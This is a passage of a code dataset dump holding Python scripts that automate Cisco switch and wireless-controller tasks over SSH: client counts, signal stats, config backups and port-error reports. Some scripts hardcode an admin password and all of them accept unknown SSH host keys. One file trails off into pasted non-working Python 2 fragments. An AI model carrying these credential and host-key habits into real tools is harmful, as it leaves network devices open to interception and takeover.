AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napnamelist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apnamelist.append(templist[0])\n\nAP_group_name = 'GB-AP-Group'\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for name in apnamelist:\n file2.write(\"config ap group-name {0} {1}\\n\".format(AP_group_name, name))\n file2.write('y\\n')\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5474327802658081, "alphanum_fraction": 0.5721271634101868, "avg_line_length": 27.40277862548828, "blob_id": "84f3fc9d077c6e64588614201c38702a08daa54e", "content_id": "c9afe7e28bd89b15f6fe93becdfcf86ced2450b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4090, "license_type": "no_license", "max_line_length": 111, "num_lines": 144, "path": "/Clients_per_AP/clients_per_ap_v3.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# show client summary processing\n# @author mcs\n# 4/24/2018\n\n# https://stackoverflow.com/questions/41879712/python-list-of-lists-to-dataframe-assertionerror\n\n# https://stackoverflow.com/questions/42869544/dictionary-of-lists-to-dataframe\n\n# https://stackoverflow.com/questions/25292568/converting-a-dictionary-with-lists-for-values-into-a-dataframe\n\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom collections import defaultdict\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(0.9)\n discard = ssh_channel.recv(10000)\n ssh_channel.send(\"show ap summary\" + \"\\n\")\n time.sleep(0.9)\n outp = ssh_channel.recv(100000)\n shapsumstring = outp.decode(\"utf-8\")\n shapsumlist = shapsumstring.splitlines()\n shapsumlist = shapsumlist[9:-2]\n regex1 = re.compile(r'(.+?)(?: 2)')\n\n d = defaultdict(int)\n e = {}\n\n for line in shapsumlist:\n mo = regex1.search(line)\n ap_name = mo.group(1).rstrip()\n e[ap_name] = []\n\n c = 0\n x = 0\n starttime = time.time()\n while x < 5:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(0.9)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n regex2 = re.compile(r'(?:(?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))(?:\\s)(.+?)(?:\\s)')\n\n for line in shclisumlist:\n mo = regex2.search(line)\n ap_name = mo.group(1)\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n d.clear()\n shclisumstring = ''\n shclisumlist.clear()\n\n for key in e:\n if len(e[key]) == c:\n e[key].append(0)\n c += 1\n\n if x == 4:\n print()\n print('{:25}{:1}'.format(' AP', ' Count', ))\n print('=' * 43)\n\n for k, v in e.items():\n print('{:25}'.format(k), end='')\n for i in v:\n print('{:6}'.format(i), end='')\n print()\n break\n\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\n x += 1\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n ap_data(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5108038187026978, "alphanum_fraction": 0.5401901602745056, "avg_line_length": 29.447368621826172, "blob_id": "dbb6a13109fa5198bf74171ceb263aca586d99cf", "content_id": "0a983c8a64bc6339b18a011956587476d777f6e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2314, "license_type": "no_license", "max_line_length": 115, "num_lines": 76, "path": "/config_backup/config_backup.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# @version 0.1\n# device backup\n# @author mcs\n# 5/18/2017\n\nimport paramiko\nimport csv\nimport time\nimport os\n\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n\n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n hostlist = output.splitlines()\n hostname1 = hostlist[1]\n hostname = hostname1[:-1]\n\n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt quiet\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '-' + '%s' + '_' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n \n if os.path.isfile(\"flash:vlan.dat\"):\n ssh_channel.send(\"copy flash:vlan.dat flash:\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy flash:\" + filename + \".dat\" \" tftp://192.168.1.106/\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy run tftp://192.168.1.106/\" + filename + \".cfg\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt noisy\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n" }, { "alpha_fraction": 0.5354330539703369, "alphanum_fraction": 0.5511810779571533, "avg_line_length": 28.633333206176758, "blob_id": "b03ab8fbb842ea582c6772e6d4f5aefae08448e9", "content_id": "28f61abdb2889b5194cff100adacd1c3bae349ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 889, "license_type": "no_license", "max_line_length": 91, "num_lines": 30, "path": "/migrate_APs/assign_to_flexconnect-group.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\assign_to_flex_group.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napmaclist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apmaclist.append(templist[3])\n\nAP_group_name = 'MT_Flex'\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for mac in apmaclist:\n file2.write(\"config flexconnect group {0} ap add {1}\\n\".format(AP_group_name, mac))\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5357698202133179, "alphanum_fraction": 0.5520995259284973, "avg_line_length": 30.365854263305664, "blob_id": "205015c0d9f5e4d1585c8a9089af87003b99a1af", "content_id": "53b6216f1e7d343e12f9cedbe6be1090d092d656", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5144, "license_type": "no_license", "max_line_length": 111, "num_lines": 164, "path": "/rssi_snr/rssi_snr_v030.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# rssi snr processing\n# @author mcs\n# 4/12/2018\n\n# https://stackoverflow.com/questions/4915920/how-to-delete-an-item-in-a-list-if-it-exists\n\n# https://dbader.org/blog/python-generator-expressions\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom collections import defaultdict\n\n \ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef rssi_snr(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(0.9)\n outp = ssh_channel.recv(25000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumstring = ''\n\n d = defaultdict(dict)\n\n x = 0\n starttime = time.time()\n while x < 1:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n regex1 = re.compile(r'((?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))')\n regex2 = re.compile(r'(.+?)(?:\\.+?\\s)(.*)')\n ap_MAC = set()\n\n # cleaned_list = [line for line in shclisumlist if 'AP5-Cafe_NW' in line]\n # AP5-213\n # AP5-ES_LMC\n\n ap = input(\"Please input the name of the AP we wish to examine: \")\n\n for line in (line for line in shclisumlist if ap in line):\n mo = regex1.search(line)\n ap_MAC.add(mo.group(1))\n\n ccounter = 1\n for mac in ap_MAC:\n ssh_channel.send(\"show client detail \" + mac + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(100000)\n shclidetstring = outp.decode(\"utf-8\")\n shclidetlist = shclidetstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n desired_info = []\n del shclidetlist[:1]\n del shclidetlist[111:]\n del shclidetlist[17:105]\n\n for line in shclidetlist:\n if line.startswith('Client MAC Address'):\n desired_info.append(line)\n break\n del shclidetlist[:9]\n for line in shclidetlist:\n if line.startswith('Wireless LAN Network Name'):\n desired_info.append(line)\n break\n del shclidetlist[:6]\n for line in shclidetlist:\n if line.startswith('IP Address'):\n desired_info.append(line)\n break\n del shclidetlist[:4]\n for line in shclidetlist:\n if line.startswith(' Radio Signal Strength Indicator'):\n desired_info.append(line)\n break\n for line in shclidetlist:\n if line.startswith(' Signal to Noise Ratio'):\n desired_info.append(line)\n break\n\n client = 'Client ' + str(ccounter)\n\n print(client)\n\n for line in desired_info:\n mo = regex2.search(line)\n d[client].update({mo.group(1).strip(): mo.group(2).strip()})\n\n ccounter += 1\n shclidetstring = ''\n shclidetlist.clear()\n\n x += 1\n\n for k, v in d.items():\n print(k, ' ', v)\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n rssi_snr(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.45689791440963745, "alphanum_fraction": 0.4724559485912323, "avg_line_length": 36.052940368652344, "blob_id": "76cd2cefc471b3d525f61495d66046e7d253d782", "content_id": "cd7ae6332eebd94074ee19909775b0fec6629c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6299, "license_type": "no_license", "max_line_length": 112, "num_lines": 170, "path": "/error_detect/error_detect_0.49.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.49\n# device port error report\n# mcs\n# 6/2/2017\n\nimport paramiko\nimport time\nimport re\nimport json\nimport csv\n\n\ndef errordetect():\n csvfile = \"f:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"terminal length 0\" + \"\\n\")\n ssh_channel.send(\"show version | inc System serial|uptime|image|Model number|\\*\" + \"\\n\")\n\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n shverstring = outp.decode(\"utf-8\")\n shverlist = shverstring.splitlines()\n if shverlist[0] == '':\n del shverlist[0]\n del shverlist[:2]\n # del shverlist[:3]\n del shverlist[-1]\n uptimelist = shverlist[0].split('is ')\n uptime = uptimelist[1]\n imagelist = shverlist[1].split(':')\n imagetemp = imagelist[1]\n\n if imagetemp.startswith('/'):\n image = imagetemp[1:-1]\n\n else:\n image = imagetemp[:-1]\n\n if shverlist[2].startswith('Model'):\n modellist = shverlist[2].split(': ')\n model = modellist[1]\n serialnumlist = shverlist[3].split(': ')\n serialnum = serialnumlist[1]\n else:\n rtrRegex = re.compile(r'(\\*0\\s+)(CISCO\\d+)(\\s+)(\\w+)(\\s+)')\n mo = rtrRegex.search(shverlist[2])\n model = mo.group(2)\n serialnum = mo.group(4)\n\n ssh_channel.send(\"terminal length 0\" + \"\\n\")\n ssh_channel.send(\"show ip int brief | exc down\" + \"\\n\")\n # ssh_channel.send(\"show ip int brief\" + \"\\n\")\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n mystring = outp.decode(\"utf-8\")\n ipbrieflist = mystring.splitlines()\n hostnamelist = re.split('[>#]', ipbrieflist[1])\n hostname = hostnamelist[0]\n del ipbrieflist[:3]\n del ipbrieflist[-1]\n\n ipbriefRegex = re.compile(r'(\\S+)(.+)')\n\n ipbriefintlist = []\n for elem in ipbrieflist:\n if elem == '':\n continue\n mo = ipbriefRegex.search(elem)\n virtual_int_types = ('Loop', 'Vlan', 'Tunnel', 'Port-channel')\n if (mo.group(1)).startswith(virtual_int_types):\n continue\n # if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n # continue\n # if (mo.group(1)).startswith('Tunnel') or (mo.group(1)).startswith('Port-channel'):\n # continue\n ipbriefintlist.append(mo.group(1))\n\n print('\\n')\n print(\"=\" * 54 + \"\\n\" + 14 * \" \" + \"Physical Port Error Report\" + \"\\n\" + \"=\" * 54)\n print(\"Hostname:\\t\" + hostname)\n print(\"IP address:\\t\" + ip_addr)\n print(\"Model:\\t\\t\" + model)\n print(\"Serial:\\t\\t\" + serialnum)\n print(\"Uptime:\\t\\t\" + uptime)\n print(\"Version:\\t\" + image)\n print()\n\n output_lines = []\n for intf in ipbriefintlist:\n print(\"Interface \" + intf)\n ssh_channel.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Description'):\n del shintlist[3]\n if shintlist[19].startswith(' Received'):\n del shintlist[19]\n del shintlist[:19]\n del shintlist[-1]\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '_' + '%s' + '_' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n\n outputfile = (\"f:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + filename)\n str_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\n repr(str_object)\n with open(outputfile, 'w') as f:\n f.write(\"=\" * 54 + \"\\n\" + 14 * \" \" + \"Physical Port Error Report\" + \"\\n\" + \"=\" * 54 + \"\\n\")\n f.write(\"Hostname:\\t\" + hostname + \"\\n\")\n f.write(\"IP address:\\t\" + ip_addr + \"\\n\")\n f.write(\"Model:\\t\\t\" + model + \"\\n\")\n f.write(\"Serial:\\t\\t\" + serialnum + \"\\n\")\n f.write(\"Uptime:\\t\\t\" + uptime + \"\\n\")\n f.write(\"Version:\\t\" + image + \"\\n\")\n f.write(str_object)\n \n\ndef main():\n x = 0\n starttime = time.time()\n while x < 5:\n errordetect()\n x += 1\n if x == 5:\n break\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4695121943950653, "alphanum_fraction": 0.49390244483947754, "avg_line_length": 28.81818199157715, "blob_id": "1d2eb4d07d61d11d58c08aaf0203d5a27cd87ae0", "content_id": "e586b02d947481b5f45a932e32a4722c6c6905c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/Clients_per_AP/clients_per_ap_with_list.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "import re\nfrom collections import defaultdict\n\nclient_sum = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\show_client_summary.txt\"\nper_AP = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\Clients_per_AP.txt\"\n\nd = defaultdict(int)\ne = defaultdict(list)\n\nwith open(per_AP, 'w') as pap:\n with open(client_sum, 'r') as cs:\n for line in cs:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n total = sum(d.values())\n print(\"The total number of attached clients is: \", total)\n print()\n\n print('{:25}{:5}'.format(' AP', 'Count'))\n print('-' * 30)\n\n for k, v in d.items():\n if v > 30:\n print('{:25}{:5}'.format(k, d[k]), \" <----- Client count greater than 30.\")\n else:\n print('{:25}{:5}'.format(k, d[k]))\n" }, { "alpha_fraction": 0.6372641324996948, "alphanum_fraction": 0.6646226644515991, "avg_line_length": 22.04347801208496, "blob_id": "f7e5302cc156cfadbc939993e1770920c5310f16", "content_id": "24b2cecfe8dc1dd907eac36367b42706871d5798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2120, "license_type": "no_license", "max_line_length": 112, "num_lines": 92, "path": "/error_detect/error_detect_0.30b.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30b\n# port error detector\n# mcs\n# 5/1/2017\n#\n# rows 18 - 27\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nmystring = ''\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nipbrieflen = int(len(ipbrieflist) - 3)\ndel ipbrieflist[:2]\ndel ipbrieflist[ipbrieflen]\nprint()\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(\"*********\")\nprint(ipbriefintlist[0])\nprint(ipbriefintlist[1])\nprint(\"*********\")\nprint()\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show int f0/1\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nshintstring = outp.decode(\"utf-8\")\nprint(\"#####\")\nprint(shintstring)\nprint(\"#####\")\nshintlist = shintstring.splitlines()\nshintlen = int(len(shintlist) - 3)\ndel shintlist[:2]\ndel shintlist[shintlen]\nprint()\nerrors = shintlist[23]\nprint(errors)\nerrors_list = errors.split(\",\")\nprint(\"shintlist: \" + str(errors_list))\nprint()\n\n\ndef striplist(errlist):\n return [item.strip() for item in errlist]\n\n\nerrors_list = striplist(errors_list)\nprint(\"errors_list: \" + str(errors_list))\n\nerrRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\nerrdict = {}\nfor elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n if int(mo.group(1)) > 0:\n print(\"There are errors\")\n else:\n print(\"There are no errors\")\n\nprint(errdict)\n" }, { "alpha_fraction": 0.6323674321174622, "alphanum_fraction": 0.6459688544273376, "avg_line_length": 27.188888549804688, "blob_id": "0aab566deec5be51c0c2381d8b18e1f79b8a2073", "content_id": "aff92c2c43c5ce58c6e46d7d2b9b67641c67a662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5073, "license_type": "no_license", "max_line_length": 125, "num_lines": 180, "path": "/error_detect/error_detect_0.33.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.33\n# port error detector\n# mcs\n# 5/8/2017\n\nimport paramiko\nimport time\nimport re\nimport json\n\nip_addr = '192.168.1.206'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\ndel ipbrieflist[:4]\ndel ipbrieflist[-1]\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(hostname)\n\noutput_lines = []\nfor intf in ipbriefintlist:\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Internet'):\n del shintlist[:19]\n del shintlist[-1]\n elif shintlist[8].startswith(' input flow-control'):\n del shintlist[:19]\n del shintlist[-1]\n else:\n del shintlist[:18]\n del shintlist[-1]\n\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nstr_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\nrepr(str_object)\nwith open(outputfile, 'w') as f:\n f.write(str_object)\n\n\n\n\n\n\n# print json.dumps(output_lines, indent=4, separators=(',', ': '))\n\n\n\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nwith open(outputfile, 'w') as f:\n j = json.dumps(output_lines, indent=4, separators=(',', ': '))\n print(j, f)\nprint()\n\n\n# outputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\n# with open(outputfile, 'w') as f:\n # json.dump(output_lines, f)\n# print()\n\n # json.dump(output_lines, f)\n \n # for k, v in errdict.items():\n # print(k, v)\n \n# I am in the process of writing a program that connects to a Cisco switch or\n# router and then examines the output of a 'show int '. I then process\\parse the\n# data to the point where I have a dictionary of twenty-one key\\value pairs.\n# All values are integers.\nfor device in devices:\n s = run_show_interfaces(device)\n d = preprocess_parse(s)\n\n # Check each value. If ALL values are zero, then skip that dictionary. If ANY\n # single value is non-zero (it will be a positive integer if it is not zero),\n # then I want to save to a file the entire dictionary.\n if any(d.values()):\n filename = os.path.join(device, '.txt')\n with open(filename, 'w') as f:\n json.dump(d, f)\n\n# FYI, the any() function has an early-out and will stop looking as soon as \n# it finds a non-zero value. In Python 3, values() returns a view of the data\n# so it doesn't copy all of information. In Python 2, use viewvalues() to \n# achieve the same effect. Taken together, this will give you great preformance.\n\n\nd = {\"name\":\"interpolator\",\n \"children\":[{'name':key,\"size\":value} for key,value in sample.items()]}\nj = json.dumps(d, indent=4)\nf = open('sample.json', 'w')\nprint >> f, j\nf.close()\n\n# It this way, I got a pretty-print json file. \n# The tricks print >> f, j is found from here: http://www.anthonydebarros.com/2012/03/11/generate-json-from-sql-using-python/\n\n\n# As a second example, the script next builds a list of dictionaries, \n# with each row in the database becoming one dictionary and each field \n# in the row a key-value pair:\n\nobjects_list = []\nfor row in rows:\n d = collections.OrderedDict()\n d['id'] = row.ID\n d['FirstName'] = row.FirstName\n d['LastName'] = row.LastName\n d['Street'] = row.Street\n d['City'] = row.City\n d['ST'] = row.ST\n d['Zip'] = row.Zip\n objects_list.append(d)\n \nj = json.dumps(objects_list)\nobjects_file = 'student_objects.js'\nf = open(objects_file,'w')\nprint >> f, j\n\n\n\nif SN == SS:\n output_lines.append(\"\\n\" + \"hostname \" + row['Hostname'] + \"\\n\" * 2)\n outputfile = (\"d:\\\\mark\\\\python\\\\switch_cfg_gen\\\\\" + row['Hostname'])\n\n with open(outputfile, \"w\") as f:\n f.writelines(output_lines)\n\n output_lines = []" }, { "alpha_fraction": 0.6098901033401489, "alphanum_fraction": 0.6335164904594421, "avg_line_length": 28.593496322631836, "blob_id": "2d39714c7539e76f8b97b8272231be19850a5a39", "content_id": "2c35ff9cb8d57e2b365a277601bef57c9548a4e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3640, "license_type": "no_license", "max_line_length": 112, "num_lines": 123, "path": "/error_detect/error_detect_0.34.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.34\n# port error detector\n# mcs\n# 5/9/2017\n\nimport paramiko\nimport time\nimport re\nimport json\n\nip_addr = '192.168.1.206'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = 